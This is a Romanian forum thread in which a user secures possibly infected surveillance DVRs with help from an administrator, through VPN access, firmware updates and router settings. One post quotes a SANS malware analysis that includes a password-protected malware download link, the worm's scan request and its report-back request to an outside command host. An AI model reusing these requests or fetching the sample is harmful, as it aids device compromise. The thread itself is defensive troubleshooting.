sistem de supraveghere video cu virusi ?

Joined
Aug 9, 2020
Messages
22
Din pacate nu am reusit...-in prima locatie dvr-ul nou era conectat cu portforwarding ,erau mai multe ip-uri pe illegal login .Am sters din router setarile vechi si am setat vpn ,am setat si tel si am avut vpn connect .
Apoi am constatat ca ...nu stiu ce pas urmeaza .
Pt .ca sa vad camerele foloseam aplicatie ivms-4500 din google play setata in mod ip / domain.
Acum ?!
Inteleg ca vpn este o conexiune de internet directa cu ip-ul extern din locatie si pot sa fiu conectat cu orice dispozitiv cu acces la lan-urile routerului in cazul meu dvr-ul .Si ? Cum fac conexiunea prin browser -cu ce ip ? ,cu o aplicatie dedicata-de unde ?
Am incercat si o optiune speciala din dvr=hik-connect care trece prin serverele producatorului si am reusit ,a functionat in locatie ,acum am mesajul offline ...deci per total aprope zero.
O mana de ajutor mi-ar prinde tare bine.
 
Joined
Aug 9, 2020
Messages
22
Pe site hikvision e ceva de genul toate dvr-urile fabricate inainte de 2015 necesita update de firmware ,cred ca stiu si ei ca sunt vulnerabilitati.
Iar serv tehnic de la spyshop de la care am cumparat ultimul dvr spune ca nu a mai auzit de asa ceva si nu crede ,am trimis imagini si ...atat ca nu au nici o reactie.
Sfatul primit a fost totusi vpn ori hik connect
 
Joined
Aug 9, 2020
Messages
22
Salutare ,la locatia 2 birou AM REUSIT, cu open
vpn setari router plus aplicatia pt android openvpn server plus aplicatia specifica ivms 4500 .
Deocamdata e bine sa vad pe cartela sim cum functioneaza ,daca e stabila si ce intarziete are .
Mai am de rezolvat in locatia 1 ...
 
Joined
Aug 9, 2020
Messages
22
Fuctioneaza vpn si pt nr.2 sa vad in timp dsca e ok
Cu ceva noroc pt ca routerul asus de la birou are pt orice setare instructiuni .
Astept sa-mi spuneti daca sunt dator cu amanunte pt nestiutori ca mine sau nu
Stima,multumesc pt implicare
 

puterfixer

Administrator
Sugar daddy
Joined
Oct 30, 2003
Messages
7,248
Conexiunea VPN o faci spre fiecare router cu ce IP sau hostname are routerul. După asta, telefonul e ca și conectat în rețeaua locală de acolo. Folosești normal ce aplicație de vizualizare camere foloseai și înainte, doar că îi modifici configurația ca să pui adresa IP a DVR-ului, nu cea a routerului.

Mai e un avantaj la asta - când ești efectiv în una din cele două locații și telefonul e conectat la wifi-ul local, pornești direct aplicația de monitorizare configurată cu IP-ul local al DVR-ului de acolo fără VPN și fără alte setări modificate.
 
Joined
Aug 9, 2020
Messages
22
Salutare,
Am vazut ca in alte forumuri la un moment dat se inchide un subiect.
Am rasfoit prin forum si am vazut ca nu e si obiceiul casei-deci se mai poate continua.
Eu am un talent special de a fi antipatic ,sper sa nu reusesc si aici .
Pana azi dupa cateva zile de la activarea vpn , dvr-ul de la birou nu mai are nici o inregistrare de ip strain (decat ip-ul alocat mie de aplicatia open vpn de genul 10.x.x.x si utilizat de mine aiurea in incercarea de conectare...)
La dvr birou am sters dns-urile si defaul gateway dar fara enable pt.dhcp nu mai vad nimic pe aplicatia de pe tel probabil nici pe laptop . E bine,e gresit ?
Am gasit pe net : ''dhcp aloca automat ip-ul ,masca de retea,gateway-ul si serverele dns '' pt reteaua lan in acest caz.
Ca sa pun alt firmware ...of,e cam riscant la nivelul meu de pricepere .Am facut asta doar la modul automat la smart tv ori router...
Am acum vizualizare camere pe tel si am reinstalat aplicatia specifica ivms4200 de pe site hikvision pe laptop acasa .
Am gasit la producator si firmware si am sa fac si asta in functie de ce o sa-mi raspundeti la urmatoarea intrebare f.importanta. DACA dvr-ul are CEVA (virus ?) punerea lui in conexiune vpn cu tel. respectiv laptop-ul nu este periculoasa in sensul propagarii acelui ceva si in acestea ?
Cei de la bitdefender au ca produs si antivirus pt vpn ?! Deci si in reteaua vpn sunt pericole ?
Poate va uitati un pic aici :

https://www.bleepingcomputer.com/ne...access-a-bunch-of-dvrs-and-their-video-feeds/

https://www.scmagazineuk.com/hack-dvr-pieces-according-pen-test-partners/article/1477647

https://krebsonsecurity.com/2016/10/who-makes-the-iot-things-under-attack/

https://krebsonsecurity.com/2016/10/hacked-cameras-dvrs-powered-todays-massive-internet-outage/

sau aici:
https://shopdelta.eu/atacuri-cibernetice-asupra-instalaiilor-de-supraveghere-video_l19_aid891.html

Apreciez mult ajutorul primit de la ''puterfixer'' ,trebuie sa fi f.f.generos sa-ti pierzi timpul si sa-i explici unui novice care nu stie mai nimic , fara el nu incercam eu retea vpn .
Nu am mai fost asa de incantat ca pot sa fac ceva important de pe vremea cand am reinstalat prima oara singur wind. ori cand din nimereala reuseam sa-mi instalez prima versiune de linux -daca nu gresesc era mandriva .( am evoluat f.putin si acum am linux pe stick usb cu persistenta in ideea de experimenta ori pt.a evita virusii-dar tot la nivelul de incepator stangaci sunt... )
Dvr-ul vidy care a fost cel mai afectat si care acum este intr-o cutie langa mine,credeti ca mai poate fi utilizat in siguranta si in ce conditii ?
Daca raspunsul e nu categoric atunci oare gasesc pe cineva ,institutie ,persoana,cineva din xf forum interesat sa-l studieze si sa-mi spuna si mie si altora ce a gasit ?
Am incercat de deschid https://housecall.trendmicro.com/
si browserul zice ca e zona nesigura iar pe
https://www.shodan.io/ nu am stiut ce sa caut.
 

puterfixer

Administrator
Sugar daddy
Joined
Oct 30, 2003
Messages
7,248
Eh, uneori mai am și eu câteva minute libere :wink:

La HouseCall văd că i-au șters adresa aia scurtă, acuma trebuie să-l cauți la ei pe site. Uite aici: https://www.trendmicro.com/en_gb/forHome/products/housecall.html . De acolo începi prin a descărca scannerul antivirus pentru Windows, fie pe 32 sau pe 64 de biți, după cum ai Windows-ul. Dacă nu ești sigur, ăla pe 32 biți merge în ambele cazuri. După descărcare, deschizi fișierul și urmezi pașii cu next-next-next.

Sună bine că n-ai mai văzut accesări în DVR-uri. :smile: Deci modificările făcute și-au atins obiectivul.

Cu DHCP oprit în DVR-uri, trebuie să pui manual adresă IP la fiecare DVR ca să poată comunica în rețeaua locală. Am scris anterior cum. Aceeași adresă IP definită de tine manual o vei putea pune apoi în aplicația de acces la camere.

Conectarea prin VPN la rețeaua unde e DVR-ul încă posibil infectat va expune telefonul sau calculatorul de pe care ai inițiat tunelul VPN la conexiuni și în direcție inversă, de la DVR spre telefon/calculator. Însă virusul din DVR, dacă mai există, este făcut să țintească alte sisteme DVR sau camere de supraveghere vulnerabile, nu calculatoare sau telefoane, deci nu mi-aș face probleme din cauza asta.

Io presupun că virusul rămâne activ doar în memoria DVR-ului pornit și dispare la repornirea DVR-ului (până la următoarea reinfectare prin rețea/Internet de la un alt DVR infectat). E foarte puțin probabil ca virusul să fie capabil să se scrie în firmware-ul atâtor de multe tipuri de DVR și camere fără să le mucifice iremediabil; firmware-ul e ceva foarte specific pentru fiecare model de aparat. Da' mai bine să suflu și-n iaurt și să merg pe calea cea mai sigură de a actualiza firmware-ul. Operațiunea nu e complicată, trebuie doar să pui fișierul cu firmware-ul (extras din arhiva ZIP dacă așa a fost publicat) pe un stick USB, să conectezi stick-ul la DVR, și să folosești opțiunea de actualizare din meniul DVR-ului când ești lângă aparatul în sine. Nu prea am văzut DVR-uri la care să poți face treaba asta și de la distanță, prin rețea/internet, da' poate modelele tale-s mai șmechere.

Articolele de mai sus sunt exact dovada pentru cât sunt de prost securizate toate aparatele astea cu conexiune la rețea/internet, motiv pentru care au putut și să apară viruși pentru ele. Ce să zic, cândva m-am folosit și eu de vulnerabilitatea asta pentru a intra ca admin într-un DVR la care cineva uitase parola de administrare și sistemul nu oferea vreun buton de resetare sau altă metodă care să verifice faptul că ești fizic lângă aparat și deci teoretic ești îndreptățit să îți bagi nasul în el. Am aflat pe net că, în funcție de data calendaristică, se poate calcula cu o formulă matematică un cod numeric ce poate fi folosit drept parolă de administrare, iar chestia asta funcționează oricând pentru orice DVR al firmei respective, prin conexiune de la distanță. Halal securitate.

DVR-ul ăla în plus ar trebui să îl consideri suspicios și să nu îl conectezi în rețea până când nu îi actualizezi firmware-ul. După aceea, îl poți folosi, dar să NU mai permiți vreodată să poată fi accesat direct din Internet prin router (sau fără router deloc). Firmware-ul actualizat ar trebui să elimine suspiciunea că virusul mai există în firmware-ul actual din aparat, DAR nu garantează că chinezii au rezolvat problemele de securitate care au permis accesul de la distanță și infectarea, de-aia expunerea directă la internet poate însemna o nouă infectare.

În firmele mai mărișoare, de obicei rețeaua locală se delimitează pentru anumite tipuri de utilizări, în „segmente” sau „zone” diferite. De exemplu, într-un grup vor fi calculatoarele și imprimantele folosite în mod normal pentru activitatea de birou, în alt grup vor fi doar aparatele de plată cu cardul, în alt grup vor fi doar DVR-urile și alte echipamente de securitate, și nici unul dintre aceste grupuri nu poate accesa sisteme din celelalte grupuri. Asta se face folosind un switch cu management (cel puțin), mai costisitor și cu cerințe pentru cunoștințe solide de rețelistică, dar așa se poate preveni mai bine propagarea unui virus sau accesul neautorizat. Pentru tine ar fi mult prea costisitor, și deocamdată ai obținut același rezultat prin configurarea routerelor.
 
Joined
Aug 9, 2020
Messages
22
Pare sa fie un posibil raspuns la ce virus este si cum se poate indeparta ...

https://isc.sans.edu/forums/diary/M...Disk+Station+and+now+with+Bitcoin+Miner/17879

Update: Just found what looks like a bitcoin miner on the infected DVR. There are two more binaries. D72BNr, the bitcoin miner (according to the usage info based on strings) and mzkk8g, which looksl ike a simplar http agent, maybe to download additional tools easily (similar to curl/wget which isn't installed on this DVR by default). I will add these two files to https://isc.sans.edu/diaryimages/hikvision.zip shortly.

Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ).

Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) .

The malware resides in /dev/cmd.so . A number of additional suspect files where located in the /dev directory which we still need to recover / analyze from the test system. The compromisse of the DVR likely happened via an exposed telnet port and a default root password (12345).

Analysis of the malware is still ongoing, and any help is appreciated (see link to malware above). Here are some initial findings:

- The malware is an ARM binary, indicating that it is targeting devices, not your typical x86 Linux server.
- The malware scans for Synology devices exposed on port 5000. The http request sent by the malware:

GET /webman/info.cgi?host= HTTP/1.0

Host: [IP Address of the Target]:5000

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Content-Type: application/x-www-form-urlencoded

Content-Length: 0



- it then extracts the firmware version details and transmits them to 162.219.57.8. The request used for this reporting channel:



GET /k.php?h=%lu HTTP/1.0

Host: 162.219.57.8

User-Agent: Ballsack

Connection: close



So in short, this malware is just scanning for vulnerable devices, and the actual exploit will likely come later.


[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter


OCT 16Who Makes the IoT Things Under Attack?
....

Update, 8:30 p.m. ET: Added final section with the sobering caveat that all of this hassle in changing the default passwords and updating the firmware may not actually solve the problem for many (if not all) of the affected
 

puterfixer

Administrator
Sugar daddy
Joined
Oct 30, 2003
Messages
7,248
Da, în cazul fericit prin rescrierea de firmware scapi de fișierele infectate și DVR-ul devine "curat". Dar nu scapi de vulnerabilitatea prin care DVR-ul a putut fi infectat anterior și va putea fi infectat și în viitor, dacă e accesibil din Internet.
 
Joined
Aug 9, 2020
Messages
22
Am verificat si locatia 1 si nu am mai gasit nimic suspect ,super .
Reteaua vpn deocamdata e ok si functioneaza !
Routerele au pt vpn mai multe optiuni,eu am activat in vpn server doar open vpn .
Si aveam ca optiuni - local network only vs internet and local network .Am ales la birou -local only si la celalalt- internet and local . Am ales bine ?
Mai erau- pptp vpn server si vpn client ...
Poate gresesc dar in postul meu anterior ultimul citat spune ca e posibil ca inlocuire firmware nu rezolva problema .
Ca o masura in plus de securitate cineva zice pe net despre activare filtru cu mac address in router in care sa trec doar dispozitivele mele .
Vad ceva in routet in setari- lan, -dhcp server, -manually assignment around the dhcp list si unde se cere mac address si ip .
Asta sa fie ? Multumesc .
 

puterfixer

Administrator
Sugar daddy
Joined
Oct 30, 2003
Messages
7,248
Hai să reformulez atunci. Problema 1 e firmware-ul praștie al DVR-ului, care permite intrarea prin rețea ca administrator cu o parolă universală. Problema 2 e că firmware-ul a fost modificat de virus ca să facă și chestii pe care tu nu le vrei.

Prin rescrierea firmware-ului oficial, tu obții doar eliminarea problemei 2, adică eradicarea virusului din firmware-ul din aparat. Însă firmware-ul pe care îl scrii va avea în continuare problema 1, care îi permite reinfectarea dacă DVR-ul poate fi accesat la liber din internet, și deci reapariția problemei 2 atâta timp cât DVR-ul poate fi accesat direct din router. Problema asta nu se va rezolva până când chinezii se pun pe treabă și fac un firmware ca lumea, ceea ce n-o să se întâmple în viitorul previzibil.

Cu filtrarea adresei MAC nu faci nimic, asta merge doar în rețeaua locală dar nu și din internet, ori presupun că rețeaua locală e ok și nu ai intruși acolo.

Setarea aia pe care ai găsit-o în router este ca serverul DHCP din router să dea întotdeauna aceeași adresă IP (sau o adresă preferențială) unui anumit dispozitiv conectat în rețeaua locală, pe baza adresei lui MAC. Fără asta, adresele IP sunt date pe sistemul primul venit primul servit. Pentru niște echipamente pornite non-stop nu ar trebui să te deranjeze cu nimic. Dar nu are nici o legătură cu restricționarea accesului în vreun fel.

Ceea ce ai făcut până acum ai făcut foarte bine. Serverul OpenVPN ar fi bine să îl setezi să meargă pentru acces „local only”, fără internet. Asta înseamnă că, odată conectat tunelul VPN de la telefon la router, telefonul va putea accesa internetul „pe direct” și doar conexiunile spre DVR le va transmite prin tunelul VPN. Dacă activezi și varianta cu internet, atunci telefonul va trimite TOT traficul prin tunelul VPN atunci când VPN-ul e conectat, inclusiv accesările ce nu au legătură cu DVR-ul, de exemplu dacă te uiți la un clip pe youtube. În unele cazuri modul ăsta de lucru e necesar, dar pentru tine probabil vei descoperi că îți va merge netul mai încet pe telefon atunci când ai VPN-ul activ. Deci lasă doar „local only”.
 
Joined
Aug 9, 2020
Messages
22
Salutare,
Azi am facut upgrade pt firmware la dvr birou.
Nu credeam ca e asa de simplu,-credeam ca o sa trebuiasca sa refac toate setarile si ca o sa pierd inregistrarile din jurnale care se pare ca nu sunt pe hdd.
Deci rezolvat insa nu stiu daca presupusul virus a fost deranjat cu ceva…
Am continuat sa caut despre securizare router si am gasit pe youtube cat de relativ usor e pt unii sa intre prin wifi .
Am corectat setarile mele cu recomandarile de dezactivare wps ,redenumire ssid cu ceva nesugestiv ,micsorare nivel semnal si activare filtru cu mac address pt wifi .
Impreuna cu reteaua vpn sper ca e o securitate mult mai buna decat aveam anterior.

Am gasit si ceva f interesant pt mine referitor la routere asus care contin un antivirus !


Am cautat pe site asus modelele cu aiprotection
https://www.asus.com/ro/AiProtection/

si apoi preturi si sunt cam de la 950lei !
Oare merita banii pt ce ofera ?

Routerul meu rt ac55u are mesajul :

the router cannot connect to asus server to check for the firmware update

Am gasit ceva despre asta
https://www.asus.com/support/FAQ/1030651/
Nu e mai simplu cu firmware de pe stick usb ?

Si mai am o intrebare .Ca sa vad daca nu am musafiri pe internet trebuie sa accesez routerul prin browser .
Un soft care face asta dar nepericulos pt securitatea mea cunoasteti ?
Cu stima
 

puterfixer

Administrator
Sugar daddy
Joined
Oct 30, 2003
Messages
7,248
WiFi nu e chiaaaar atât de ușor de „spart”. :smile:

În principiu, nu prea am văzut cazuri în care WPS să fie folosit, fiindcă implică fie tastarea unui cod PIN pentru conectare (caz în care nu e nici o diferență față de parola normală la WiFi), fie apăsarea unui buton fizic de pe router pentru a activa conectarea în următorul minut sau ceva de genul. Doar la imprimantele WiFi fără vreo metodă mai „smart” de configurare e util WPS, da' și atunci practic îl folosești o singură dată și dup-aia adio.

SSID (numele rețelei WiFi) e bine să nu indice al cui e routerul - că e al firmei sau al tău sau e routerul din apartamentul Ț. Generează o parolă de 30 de caractere amestecate, ceva care să n-aibă nici un sens, și aia e. Oricum ți-o va trebui o singură dată pentru fiecare echipament conectat. Filtrarea pe bază de MAC nu are sens; dacă nu știe parola atunci oricum nu se poate conecta, iar dacă știe parola atunci e foarte ușor în zi de azi să îți modifici adresa MAC cam pe orice aparat, deci nu mai e un criteriu de excludere în care să ai încredere.

N-am idee cât de bine protejează AiProtection ăla, dar cu siguranță nu există un antivirus care să fie cel mai bun și să acopere la fel de bine absolut toate posibilele forme de viruși. De-aia se folosește o combinație de metode de protecție, inclusiv vreo 2-3 tipuri diferite de antiviruși, fiecare mai specializat la ceva, ca să se completeze reciproc. Din câte îmi dau seama, AiProtection se bazează și pe niște liste predefinite de destinații pe care să vrei să le blochezi. Mno, dacă ai deja routerul, nu strică să activezi protecția aia că nu cere de mâncare, da' să te apuci acuma să schimbi routerul numa' pentru asta fără să ai vreo garanție că îți previne exact problema specifică cu care te-ai confruntat tu (probabil virus tip vierme pentru DVR-uri, pentru mining de criptomonede), e cam costisitor degeaba.

Pentru update-ul de firmware la router, poți face asta și prin browser, cu fișierul descărcat în calculatorul tău. Interfața de administrare prin rețea la DVR de obicei nu e foarte capabilă și de-aia am zis de pus fișierul cu firmware pe un stick, dar la routere e bine bătătorită calea cu actualizarea prin browser. Poți folosi orice browser preferi - Edge (pe Windows 10) are din luna mai același „motor” ca și Google Chrome, sau Firefox. Am pățit și eu ca un router Asus să nu se mai poată conecta direct la serverul de actualizări ca să verifice dacă are o versiune mai nouă, dar dacă descarci tu manual ultimul firmware oficial și îl instalezi prin browser e totul ok.
 
Joined
Aug 9, 2020
Messages
22
Salutare
A trecut ceva timp...Cateva informatii de final pt acest subiect.
Am facut toate actualizarile de firmware pt routere si dvr-uri.
Surpriza pt mine a fost ca in dvr-ul vidy (la care nu umblase nimeni !) nu am mai gasit nici un fel de informatii legate de acele ip-uri din fotografiile postate .
A stat aprox 2 sapt in cutie fara alimentare si se pare ca unele informatii au disparut,posibil si acel soft periculos.
Acum pot vedea camerele de supraveghere pe telefon sau pe laptop prin reteaua openvpn.
Functionarea nu e grozava ,are ceva intarziere ,uneori nu se conecteaza ,dar asta e tot ce am in varianta safe, asa ca ...
 
Top Bottom